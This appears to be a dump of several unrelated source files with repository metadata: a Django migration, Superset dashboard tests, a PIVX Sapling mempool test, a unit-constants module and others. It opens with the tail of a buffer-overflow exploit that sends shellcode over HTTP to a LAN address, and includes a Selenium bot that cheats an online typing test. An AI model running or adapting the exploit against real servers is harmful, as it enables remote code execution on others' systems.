buf += b"\xc9\xb1\x31\x31\x57\x13\x03\x57\x13\x83\xc7\x83\xcf"
buf += b"\xed\xcb\x63\x8d\x0e\x34\x73\xf2\x87\xd1\x42\x32\xf3"
buf += b"\x92\xf4\x82\x77\xf6\xf8\x69\xd5\xe3\x8b\x1c\xf2\x04"
buf += b"\x3c\xaa\x24\x2a\xbd\x87\x15\x2d\x3d\xda\x49\x8d\x7c"
buf += b"\x15\x9c\xcc\xb9\x48\x6d\x9c\x12\x06\xc0\x31\x17\x52"
buf += b"\xd9\xba\x6b\x72\x59\x5e\x3b\x75\x48\xf1\x30\x2c\x4a"
buf += b"\xf3\x95\x44\xc3\xeb\xfa\x61\x9d\x80\xc8\x1e\x1c\x41"
buf += b"\x01\xde\xb3\xac\xae\x2d\xcd\xe9\x08\xce\xb8\x03\x6b"
buf += b"\x73\xbb\xd7\x16\xaf\x4e\xcc\xb0\x24\xe8\x28\x41\xe8"
buf += b"\x6f\xba\x4d\x45\xfb\xe4\x51\x58\x28\x9f\x6d\xd1\xcf"
buf += b"\x70\xe4\xa1\xeb\x54\xad\x72\x95\xcd\x0b\xd4\xaa\x0e"
buf += b"\xf4\x89\x0e\x44\x18\xdd\x22\x07\x76\x20\xb0\x3d\x34"
buf += b"\x22\xca\x3d\x68\x4b\xfb\xb6\xe7\x0c\x04\x1d\x4c\xe2"
buf += b"\x4e\x3c\xe4\x6b\x17\xd4\xb5\xf1\xa8\x02\xf9\x0f\x2b"
buf += b"\xa7\x81\xeb\x33\xc2\x84\xb0\xf3\x3e\xf4\xa9\x91\x40"
buf += b"\xab\xca\xb3\x22\x2a\x59\x5f\x8b\xc9\xd9\xfa\xd3"
payload = pad + ret + nop + buf
r = remote('192.168.122.187', 80)
r.write(b'GET ' + payload + b' HTTP/1.1\r\n\r\n')
| 37.675676
| 62
| 0.663558
|
776e297a1ca902ec101507d3e1aea6a6aaf64c37
| 610
|
py
|
Python
|
store/migrations/0005_auto_20150815_1745.py
|
bharathramh92/easy-ecom
|
164f1b6e11559386efef474c5f50d33b4ddea792
|
[
"Apache-2.0"
] | null | null | null |
store/migrations/0005_auto_20150815_1745.py
|
bharathramh92/easy-ecom
|
164f1b6e11559386efef474c5f50d33b4ddea792
|
[
"Apache-2.0"
] | null | null | null |
store/migrations/0005_auto_20150815_1745.py
|
bharathramh92/easy-ecom
|
164f1b6e11559386efef474c5f50d33b4ddea792
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('store', '0004_inventory_listing_end_datetime'),
]
operations = [
migrations.AlterField(
model_name='mainsubcategory',
name='sub_category_fk',
field=models.ForeignKey(to='store.SubCategory'),
),
migrations.AlterField(
model_name='subcategory',
name='category_fk',
field=models.ForeignKey(to='store.Category'),
),
]
| 24.4
| 60
| 0.606557
|
31f24bac677aad8ddb192e03c12e860a1a0bdb0b
| 954
|
py
|
Python
|
Projects/fastfingers/hackit.py
|
Vinay26k/python
|
9acfb8b6a2ba2dbe0621edf2260d29cc0e3b087d
|
[
"MIT"
] | 3
|
2019-02-22T12:57:15.000Z
|
2021-08-07T16:27:47.000Z
|
Projects/fastfingers/hackit.py
|
Vinay26k/python
|
9acfb8b6a2ba2dbe0621edf2260d29cc0e3b087d
|
[
"MIT"
] | null | null | null |
Projects/fastfingers/hackit.py
|
Vinay26k/python
|
9acfb8b6a2ba2dbe0621edf2260d29cc0e3b087d
|
[
"MIT"
] | 2
|
2019-04-27T06:02:12.000Z
|
2020-12-16T14:50:41.000Z
|
from selenium import webdriver
from bs4 import BeautifulSoup
from time import sleep
path = r'C:\Users\lenovo\Documents\Vinay Python\github\selenium drivers\chromedriver.exe'
driver = webdriver.Chrome(path)
#change these
user = 'username'
pswd ='password'
taurl = r'https://10fastfingers.com/account/twitter_login'
driver.get(taurl)
sf = driver.find_element_by_id('username_or_email')
sf.send_keys(user)
sf = driver.find_element_by_id('password')
sf.send_keys(pswd)
sf = driver.find_element_by_id('allow')
sf.click()
url = r'https://10fastfingers.com/typing-test/english'
#url = r'https://10fastfingers.com/multiplayer/alpha'
driver.get(url)
soup = BeautifulSoup(driver.page_source,'html.parser')
count = 0
for x in soup.find_all('div',attrs={'id':'row1'}):
sf = driver.find_element_by_id('inputfield')
sf.send_keys(x.get_text())
if count == 20:
sleep(1)
count = 0
count += 1
| 26.5
| 90
| 0.703354
|
2a79d854f33a2ac4d17f42613b8691bf557a1308
| 396
|
py
|
Python
|
unfuddle/AppEngine/trackable/app.py
|
pdbartlett/misc-stuff
|
0cebbbf30d13a070a663d58519e2dd5c35c765d2
|
[
"Apache-2.0"
] | null | null | null |
unfuddle/AppEngine/trackable/app.py
|
pdbartlett/misc-stuff
|
0cebbbf30d13a070a663d58519e2dd5c35c765d2
|
[
"Apache-2.0"
] | 1
|
2020-03-24T22:28:58.000Z
|
2020-03-24T22:28:58.000Z
|
unfuddle/AppEngine/trackable/app.py
|
pdbartlett/misc-stuff
|
0cebbbf30d13a070a663d58519e2dd5c35c765d2
|
[
"Apache-2.0"
] | null | null | null |
import wsgiref.handlers
from google.appengine.ext import webapp
import mainpage
import profilepage
import registerpage
def main():
application = webapp.WSGIApplication([
('/', mainpage.Page),
('/profile', profilepage.Page),
('/register', registerpage.Page),
], debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
| 20.842105
| 49
| 0.684343
|
1e3586c64da378a2d9d38302928411d5b5e04993
| 4,538
|
py
|
Python
|
test/functional/sapling_mempool.py
|
ComputerCraftr/peps-new
|
e92cc732a96a567b66c0ce665a03496e15b2702d
|
[
"MIT"
] | 3
|
2021-07-08T20:51:48.000Z
|
2021-12-19T01:35:23.000Z
|
test/functional/sapling_mempool.py
|
theabundancecoin/TACC
|
fd7d38c6a04dcb2da3b2755879b153b4731cddb2
|
[
"MIT"
] | null | null | null |
test/functional/sapling_mempool.py
|
theabundancecoin/TACC
|
fd7d38c6a04dcb2da3b2755879b153b4731cddb2
|
[
"MIT"
] | 1
|
2021-07-25T22:35:58.000Z
|
2021-07-25T22:35:58.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2020 The PIVX Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import PivxTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
from decimal import Decimal
# Test mempool interaction with Sapling transactions
class SaplingMempoolTest(PivxTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [['-nuparams=v5_shield:1']] * self.num_nodes
def run_test(self):
miner = self.nodes[0]
alice = self.nodes[1]
# Fixed fee
fee = 0.05
self.log.info("Mining 120 blocks...")
miner.generate(120)
self.sync_all()
# Sanity-check the test harness
assert_equal([x.getblockcount() for x in self.nodes], [120] * self.num_nodes)
# miner sends a 10 PIV note to Alice
self.log.info("Shielding some coins for Alice...")
alice_zaddr = alice.getnewshieldaddress()
miner.shieldsendmany("from_transparent", [{"address": alice_zaddr, "amount": Decimal('10.00')}], 1, fee)
miner.generate(1)
self.sync_all()
assert_equal(alice.getshieldbalance(alice_zaddr), Decimal('10.00'))
# Alice creates (but doesn't send) tx_A to transparent address tadd_A
self.log.info("Alice creating tx_A...")
tadd_A = alice.getnewaddress()
rawTx_hex = alice.rawshieldsendmany(alice_zaddr, [{"address": tadd_A, "amount": Decimal('9.00')}], 1, fee)
# Alice creates and sends tx_B, unshielding the same note to tadd_B
self.log.info("Alice creating and sending tx_B...")
tadd_B = alice.getnewaddress()
txid_B = alice.shieldsendmany(alice_zaddr, [{"address": tadd_B, "amount": Decimal('9.95')}], 1, fee)
# Miner receives tx_B and accepts it in the mempool
assert (txid_B in alice.getrawmempool())
self.sync_mempools()
assert(txid_B in miner.getrawmempool())
self.log.info("tx_B accepted in the memory pool.")
# Now tx_A would double-spend the sapling note in the memory pool
assert_raises_rpc_error(-26, "bad-txns-nullifier-double-spent",
alice.sendrawtransaction, rawTx_hex)
self.log.info("tx_A NOT accepted in the mempool. Good.")
# Mine tx_B and try to send tx_A again
self.log.info("Mine a block and verify that tx_B gets on chain")
miner.generate(1)
self.sync_all()
txB_json = alice.getrawtransaction(txid_B, True)
assert("blockhash" in txB_json)
self.log.info("trying to relay tx_A again...")
assert_raises_rpc_error(-26, "bad-txns-shielded-requirements-not-met",
alice.sendrawtransaction, rawTx_hex)
self.log.info("tx_A NOT accepted in the mempool. Good.")
# miner sends another 10 PIV note to Alice
self.log.info("Shielding some more coins for Alice...")
miner.shieldsendmany("from_transparent", [{"address": alice_zaddr, "amount": Decimal('10.00')}], 1, fee)
miner.generate(1)
self.sync_all()
assert_equal(alice.getshieldbalance(alice_zaddr), Decimal('10.00'))
# Alice creates and sends tx_C, unshielding the note to tadd_C
self.log.info("Alice creating and sending tx_C...")
tadd_C = alice.getnewaddress()
txC_hex = alice.rawshieldsendmany(alice_zaddr, [{"address": tadd_C, "amount": Decimal('9.00')}], 1, fee)
txid_C = alice.sendrawtransaction(txC_hex)
# Miner receives tx_C and accepts it in the mempool
self.sync_mempools()
assert(txid_C in miner.getrawmempool())
self.log.info("tx_C accepted in the memory pool.")
# Now disconnect the block with the note's anchor,
# and check that the tx is removed from the mempool
self.log.info("Disconnect the last block to change the sapling anchor")
anchor = alice.decoderawtransaction(txC_hex)['vShieldSpend'][0]['anchor']
assert_equal(anchor, miner.getbestsaplinganchor())
miner.invalidateblock(miner.getbestblockhash())
assert (anchor != miner.getbestsaplinganchor())
assert(txid_C not in miner.getrawmempool())
self.log.info("Good. tx_C removed from the memory pool.")
if __name__ == '__main__':
SaplingMempoolTest().main()
| 42.811321
| 114
| 0.659101
|
ce323b97068ed21757533f3de9b0c080b1946d21
| 2,763
|
py
|
Python
|
wfsim/units.py
|
WenzDaniel/WFSim
|
89d8ea149215a158b48b1d38c72af1a2f1e9c5c0
|
[
"BSD-3-Clause"
] | null | null | null |
wfsim/units.py
|
WenzDaniel/WFSim
|
89d8ea149215a158b48b1d38c72af1a2f1e9c5c0
|
[
"BSD-3-Clause"
] | null | null | null |
wfsim/units.py
|
WenzDaniel/WFSim
|
89d8ea149215a158b48b1d38c72af1a2f1e9c5c0
|
[
"BSD-3-Clause"
] | null | null | null |
"""Define unit system for pax (i.e., seconds, etc.)
This sets up variables for the various unit abbreviations, ensuring we always
have a 'consistent' unit system. There are almost no cases that you should
change this without talking with a maintainer.
"""
from __future__ import division
# From physics.nist.gov, January 2015
electron_charge_SI = 1.602176565 * 10 ** (-19)
boltzmannConstant_SI = 1.3806488 * 10 ** (-23)
m = 10 ** 2 # distances in cm
s = 10 ** 9 # times in ns
eV = 1 # energies in eV
C = 1 / electron_charge_SI # Charge in # electrons, so voltage in Volts
K = 1 # Temperature in Kelvins
# derived units
Hz = 1 / s
J = eV / electron_charge_SI
kg = J * s ** 2 / m ** 2
V = J / C
A = C / s
N = J / m
Pa = N / m ** 2
bar = 10 ** 5 * Pa
Ohm = V / A
# 10 ^ -3 base units
mm = 10 ** (-3) * m
ms = 10 ** (-3) * s
mK = 10 ** (-3) * K
mC = 10 ** (-3) * C
meV = 10 ** (-3) * eV
mHz = 10 ** (-3) * Hz
mJ = 10 ** (-3) * J
g = 10 ** (-3) * kg
mV = 10 ** (-3) * V
mA = 10 ** (-3) * A
mN = 10 ** (-3) * N
mPa = 10 ** (-3) * Pa
mbar = 10 ** (-3) * bar
mOhm = 10 ** (-3) * Ohm
# 10 ^ -6 base units
um = 10 ** (-6) * m
us = 10 ** (-6) * s
uK = 10 ** (-6) * K
uC = 10 ** (-6) * C
ueV = 10 ** (-6) * eV
uHz = 10 ** (-6) * Hz
uJ = 10 ** (-6) * J
mg = 10 ** (-6) * kg
uV = 10 ** (-6) * V
uA = 10 ** (-6) * A
uN = 10 ** (-6) * N
uPa = 10 ** (-6) * Pa
ubar = 10 ** (-6) * bar
uOhm = 10 ** (-6) * Ohm
# 10 ^ -9 base units
nm = 10 ** (-9) * m
ns = 10 ** (-9) * s
nK = 10 ** (-9) * K
nC = 10 ** (-9) * C
neV = 10 ** (-9) * eV
nHz = 10 ** (-9) * Hz
nJ = 10 ** (-9) * J
ug = 10 ** (-9) * kg
nV = 10 ** (-9) * V
nA = 10 ** (-9) * A
nN = 10 ** (-9) * N
nPa = 10 ** (-9) * Pa
nbar = 10 ** (-9) * bar
nOhm = 10 ** (-9) * Ohm
# 10 ^ 3 base units
km = 10 ** 3 * m
ks = 10 ** 3 * s
kK = 10 ** 3 * K
kC = 10 ** 3 * C
keV = 10 ** 3 * eV
kHz = 10 ** 3 * Hz
kJ = 10 ** 3 * J
Mg = 10 ** 3 * kg
kV = 10 ** 3 * V
kA = 10 ** 3 * A
kN = 10 ** 3 * N
kOhm = 10 ** 3 * Ohm
kbar = 10 ** 3 * bar
kPa = 10 ** 3 * Pa
# 10 ^ 6 base units
Mm = 10 ** 6 * m
Ms = 10 ** 6 * s
MK = 10 ** 6 * K
MC = 10 ** 6 * C
MeV = 10 ** 6 * eV
MHz = 10 ** 6 * Hz
MJ = 10 ** 6 * J
Gg = 10 ** 6 * kg
MV = 10 ** 6 * V
MA = 10 ** 6 * A
MN = 10 ** 6 * N
MOhm = 10 ** 6 * Ohm
Mbar = 10 ** 6 * bar
MPa = 10 ** 6 * Pa
# 10 ^ 9 base units
Gm = 10 ** 9 * m
Gs = 10 ** 9 * s
GK = 10 ** 9 * K
GC = 10 ** 9 * C
GeV = 10 ** 9 * eV
GHz = 10 ** 9 * Hz
GJ = 10 ** 9 * J
GV = 10 ** 9 * V
GA = 10 ** 9 * A
GN = 10 ** 9 * N
GOhm = 10 ** 9 * Ohm
Gbar = 10 ** 9 * bar
GPa = 10 ** 9 * Pa
# other units
cm = 10 ** (-2) * m
ng = 10 ** (-12) * kg
# Townsend (unit for reduced electric field)
Td = 10 ** (-17) * V / cm ** 2 # noqa
electron_charge = electron_charge_SI * C
boltzmannConstant = boltzmannConstant_SI * J / K
| 19.735714
| 77
| 0.475208
|
890b060d60c62c0beb6cf2f5884804ea67aacfd0
| 246
|
py
|
Python
|
setup.py
|
dgitts/electric-load-forecasting
|
9fd6ccac52d76d6395fd8650b8380ab5122aef41
|
[
"MIT"
] | null | null | null |
setup.py
|
dgitts/electric-load-forecasting
|
9fd6ccac52d76d6395fd8650b8380ab5122aef41
|
[
"MIT"
] | null | null | null |
setup.py
|
dgitts/electric-load-forecasting
|
9fd6ccac52d76d6395fd8650b8380ab5122aef41
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='Energy load forecasting for commercial buildings.',
author='Colaberry DS3 Aug 2021',
license='MIT',
)
| 22.363636
| 68
| 0.691057
|
94fb806eca46c20e3a8cea6c824b16b622473846
| 2,370
|
py
|
Python
|
watertap/examples/flowsheets/case_studies/wastewater_resource_recovery/electrochemical_nutrient_removal/multi_sweep.py
|
kurbansitterley/watertap
|
1a8986a779bdcb36f1481f03eed24c6c42d26481
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
watertap/examples/flowsheets/case_studies/wastewater_resource_recovery/electrochemical_nutrient_removal/multi_sweep.py
|
kurbansitterley/watertap
|
1a8986a779bdcb36f1481f03eed24c6c42d26481
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
watertap/examples/flowsheets/case_studies/wastewater_resource_recovery/electrochemical_nutrient_removal/multi_sweep.py
|
kurbansitterley/watertap
|
1a8986a779bdcb36f1481f03eed24c6c42d26481
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
import os
import sys
from watertap.tools.parameter_sweep import (
_init_mpi,
LinearSample,
parameter_sweep,
)
import watertap.examples.flowsheets.case_studies.wastewater_resource_recovery.electrochemical_nutrient_removal.electrochemical_nutrient_removal as electrochemical_nutrient_removal
def set_up_sensitivity(m):
outputs = {}
optimize_kwargs = {"check_termination": False}
opt_function = electrochemical_nutrient_removal.solve
# create outputs
outputs["LCOW"] = m.fs.costing.LCOW
outputs["LCOS"] = m.fs.costing.LCOS
return outputs, optimize_kwargs, opt_function
def run_analysis(case_num=1, nx=11, interpolate_nan_outputs=True):
m = electrochemical_nutrient_removal.main()[0]
outputs, optimize_kwargs, opt_function = set_up_sensitivity(m)
sweep_params = {}
if case_num == 1:
# sensitivity analysis
sweep_params["MgCl2_cost"] = LinearSample(
m.fs.costing.magnesium_chloride_cost, 135, 538, nx
)
else:
raise ValueError(f"{case_num} is not yet implemented")
output_filename = "sensitivity_" + str(case_num) + ".csv"
output_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
output_filename,
)
global_results = parameter_sweep(
m,
sweep_params,
outputs,
csv_results_file_name=output_path,
optimize_function=opt_function,
optimize_kwargs=optimize_kwargs,
interpolate_nan_outputs=interpolate_nan_outputs,
)
return global_results, sweep_params, m
if __name__ == "__main__":
results, sweep_params, m = run_analysis(*sys.argv[1:])
| 32.916667
| 179
| 0.679747
|
1190d764039a191d28d54b686a278795cfe72845
| 2,344
|
py
|
Python
|
test/pyaz/iot/hub/routing_endpoint/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/iot/hub/routing_endpoint/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/iot/hub/routing_endpoint/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def create(hub_name, endpoint_name, endpoint_type, endpoint_resource_group, endpoint_subscription_id, connection_string=None, container_name=None, encoding=None, resource_group=None, batch_frequency=None, chunk_size=None, file_name_format=None, auth_type=None, endpoint_uri=None, entity_path=None, identity=None):
params = get_params(locals())
command = "az iot hub routing-endpoint create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(hub_name, endpoint_name, resource_group=None):
params = get_params(locals())
command = "az iot hub routing-endpoint show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(hub_name, endpoint_type=None, resource_group=None):
params = get_params(locals())
command = "az iot hub routing-endpoint list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(hub_name, endpoint_name=None, endpoint_type=None, resource_group=None):
params = get_params(locals())
command = "az iot hub routing-endpoint delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 39.066667
| 313
| 0.6907
|
194ba122619056ba71cbec6542fccb01ebe8d97e
| 13,070
|
py
|
Python
|
tests/dashboard_tests.py
|
MukaJiTrue/incubator-superset
|
e2854994bae0e390bfbf446c94ccb4a86792220b
|
[
"Apache-2.0"
] | 2
|
2021-04-14T01:20:33.000Z
|
2021-07-01T16:38:25.000Z
|
tests/dashboard_tests.py
|
sleepyhton/incubator-superset
|
3c17dac35a169afafe0ae3fbfd74618eacb4e642
|
[
"Apache-2.0"
] | 37
|
2020-03-24T16:43:05.000Z
|
2022-03-24T04:31:53.000Z
|
tests/dashboard_tests.py
|
sleepyhton/incubator-superset
|
3c17dac35a169afafe0ae3fbfd74618eacb4e642
|
[
"Apache-2.0"
] | 1
|
2019-06-05T10:15:05.000Z
|
2019-06-05T10:15:05.000Z
|
"""Unit tests for Superset"""
import json
import unittest
from flask import escape
from superset import db, security_manager
from superset.connectors.sqla.models import SqlaTable
from superset.models import core as models
from .base_tests import SupersetTestCase
class DashboardTests(SupersetTestCase):
def __init__(self, *args, **kwargs):
super(DashboardTests, self).__init__(*args, **kwargs)
@classmethod
def setUpClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
pass
def get_mock_positions(self, dash):
positions = {
'DASHBOARD_VERSION_KEY': 'v2',
}
for i, slc in enumerate(dash.slices):
id = 'DASHBOARD_CHART_TYPE-{}'.format(i)
d = {
'type': 'DASHBOARD_CHART_TYPE',
'id': id,
'children': [],
'meta': {
'width': 4,
'height': 50,
'chartId': slc.id,
},
}
positions[id] = d
return positions
def test_dashboard(self):
self.login(username='admin')
urls = {}
for dash in db.session.query(models.Dashboard).all():
urls[dash.dashboard_title] = dash.url
for title, url in urls.items():
assert escape(title) in self.client.get(url).data.decode('utf-8')
def test_dashboard_modes(self):
self.login(username='admin')
dash = (
db.session.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
url = dash.url
if dash.url.find('?') == -1:
url += '?'
else:
url += '&'
resp = self.get_resp(url + 'edit=true&standalone=true')
self.assertIn('editMode": true', resp)
self.assertIn('standalone_mode": true', resp)
def test_save_dash(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
positions = self.get_mock_positions(dash)
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': dash.dashboard_title,
}
url = '/superset/save_dash/{}/'.format(dash.id)
resp = self.get_resp(url, data=dict(data=json.dumps(data)))
self.assertIn('SUCCESS', resp)
def test_save_dash_with_filter(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='world_health').first()
positions = self.get_mock_positions(dash)
filters = {str(dash.slices[0].id): {'region': ['North America']}}
default_filters = json.dumps(filters)
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': dash.dashboard_title,
'default_filters': default_filters,
}
url = '/superset/save_dash/{}/'.format(dash.id)
resp = self.get_resp(url, data=dict(data=json.dumps(data)))
self.assertIn('SUCCESS', resp)
updatedDash = db.session.query(models.Dashboard).filter_by(
slug='world_health').first()
new_url = updatedDash.url
self.assertIn('region', new_url)
resp = self.get_resp(new_url)
self.assertIn('North America', resp)
def test_save_dash_with_invalid_filters(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='world_health').first()
# add an invalid filter slice
positions = self.get_mock_positions(dash)
filters = {str(99999): {'region': ['North America']}}
default_filters = json.dumps(filters)
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': dash.dashboard_title,
'default_filters': default_filters,
}
url = '/superset/save_dash/{}/'.format(dash.id)
resp = self.get_resp(url, data=dict(data=json.dumps(data)))
self.assertIn('SUCCESS', resp)
updatedDash = db.session.query(models.Dashboard).filter_by(
slug='world_health').first()
new_url = updatedDash.url
self.assertNotIn('region', new_url)
def test_save_dash_with_dashboard_title(self, username='admin'):
self.login(username=username)
dash = (
db.session.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
origin_title = dash.dashboard_title
positions = self.get_mock_positions(dash)
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': 'new title',
}
url = '/superset/save_dash/{}/'.format(dash.id)
self.get_resp(url, data=dict(data=json.dumps(data)))
updatedDash = (
db.session.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
self.assertEqual(updatedDash.dashboard_title, 'new title')
# bring back dashboard original title
data['dashboard_title'] = origin_title
self.get_resp(url, data=dict(data=json.dumps(data)))
def test_copy_dash(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
positions = self.get_mock_positions(dash)
data = {
'css': '',
'duplicate_slices': False,
'expanded_slices': {},
'positions': positions,
'dashboard_title': 'Copy Of Births',
}
# Save changes to Births dashboard and retrieve updated dash
dash_id = dash.id
url = '/superset/save_dash/{}/'.format(dash_id)
self.client.post(url, data=dict(data=json.dumps(data)))
dash = db.session.query(models.Dashboard).filter_by(
id=dash_id).first()
orig_json_data = dash.data
# Verify that copy matches original
url = '/superset/copy_dash/{}/'.format(dash_id)
resp = self.get_json_resp(url, data=dict(data=json.dumps(data)))
self.assertEqual(resp['dashboard_title'], 'Copy Of Births')
self.assertEqual(resp['position_json'], orig_json_data['position_json'])
self.assertEqual(resp['metadata'], orig_json_data['metadata'])
# check every attribute in each dashboard's slices list,
# exclude modified and changed_on attribute
for index, slc in enumerate(orig_json_data['slices']):
for key in slc:
if key not in ['modified', 'changed_on']:
self.assertEqual(slc[key], resp['slices'][index][key])
def test_add_slices(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
new_slice = db.session.query(models.Slice).filter_by(
slice_name='Energy Force Layout').first()
existing_slice = db.session.query(models.Slice).filter_by(
slice_name='Name Cloud').first()
data = {
'slice_ids': [new_slice.data['slice_id'],
existing_slice.data['slice_id']],
}
url = '/superset/add_slices/{}/'.format(dash.id)
resp = self.client.post(url, data=dict(data=json.dumps(data)))
assert 'SLICES ADDED' in resp.data.decode('utf-8')
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
new_slice = db.session.query(models.Slice).filter_by(
slice_name='Energy Force Layout').first()
assert new_slice in dash.slices
assert len(set(dash.slices)) == len(dash.slices)
# cleaning up
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
dash.slices = [
o for o in dash.slices if o.slice_name != 'Energy Force Layout']
db.session.commit()
def test_remove_slices(self, username='admin'):
self.login(username=username)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
origin_slices_length = len(dash.slices)
positions = self.get_mock_positions(dash)
# remove one chart
chart_keys = []
for key in positions.keys():
if key.startswith('DASHBOARD_CHART_TYPE'):
chart_keys.append(key)
positions.pop(chart_keys[0])
data = {
'css': '',
'expanded_slices': {},
'positions': positions,
'dashboard_title': dash.dashboard_title,
}
# save dash
dash_id = dash.id
url = '/superset/save_dash/{}/'.format(dash_id)
self.client.post(url, data=dict(data=json.dumps(data)))
dash = db.session.query(models.Dashboard).filter_by(
id=dash_id).first()
# verify slices data
data = dash.data
self.assertEqual(len(data['slices']), origin_slices_length - 1)
def test_public_user_dashboard_access(self):
table = (
db.session
.query(SqlaTable)
.filter_by(table_name='birth_names')
.one()
)
# Try access before adding appropriate permissions.
self.revoke_public_access_to_table(table)
self.logout()
resp = self.get_resp('/chart/list/')
self.assertNotIn('birth_names</a>', resp)
resp = self.get_resp('/dashboard/list/')
self.assertNotIn('/superset/dashboard/births/', resp)
self.grant_public_access_to_table(table)
# Try access after adding appropriate permissions.
self.assertIn('birth_names', self.get_resp('/chart/list/'))
resp = self.get_resp('/dashboard/list/')
self.assertIn('/superset/dashboard/births/', resp)
self.assertIn('Births', self.get_resp('/superset/dashboard/births/'))
# Confirm that public doesn't have access to other datasets.
resp = self.get_resp('/chart/list/')
self.assertNotIn('wb_health_population</a>', resp)
resp = self.get_resp('/dashboard/list/')
self.assertNotIn('/superset/dashboard/world_health/', resp)
def test_dashboard_with_created_by_can_be_accessed_by_public_users(self):
self.logout()
table = (
db.session
.query(SqlaTable)
.filter_by(table_name='birth_names')
.one()
)
self.grant_public_access_to_table(table)
dash = db.session.query(models.Dashboard).filter_by(
slug='births').first()
dash.owners = [security_manager.find_user('admin')]
dash.created_by = security_manager.find_user('admin')
db.session.merge(dash)
db.session.commit()
assert 'Births' in self.get_resp('/superset/dashboard/births/')
def test_only_owners_can_save(self):
dash = (
db.session
.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
dash.owners = []
db.session.merge(dash)
db.session.commit()
self.test_save_dash('admin')
self.logout()
self.assertRaises(
Exception, self.test_save_dash, 'alpha')
alpha = security_manager.find_user('alpha')
dash = (
db.session
.query(models.Dashboard)
.filter_by(slug='births')
.first()
)
dash.owners = [alpha]
db.session.merge(dash)
db.session.commit()
self.test_save_dash('alpha')
def test_owners_can_view_empty_dashboard(self):
dash = (
db.session
.query(models.Dashboard)
.filter_by(slug='empty_dashboard')
.first()
)
if not dash:
dash = models.Dashboard()
dash.dashboard_title = 'Empty Dashboard'
dash.slug = 'empty_dashboard'
else:
dash.slices = []
dash.owners = []
db.session.merge(dash)
db.session.commit()
gamma_user = security_manager.find_user('gamma')
self.login(gamma_user.username)
resp = self.get_resp('/dashboard/list/')
self.assertNotIn('/superset/dashboard/empty_dashboard/', resp)
dash = (
db.session
.query(models.Dashboard)
.filter_by(slug='empty_dashboard')
.first()
)
dash.owners = [gamma_user]
db.session.merge(dash)
db.session.commit()
resp = self.get_resp('/dashboard/list/')
self.assertIn('/superset/dashboard/empty_dashboard/', resp)
if __name__ == '__main__':
unittest.main()
| 34.036458
| 80
| 0.579265
|
e8d777f9adf55581baffc4eb4e74d8724888b497
| 2,650
|
py
|
Python
|
scripts/visualize_segments.py
|
shiyoung77/symseg
|
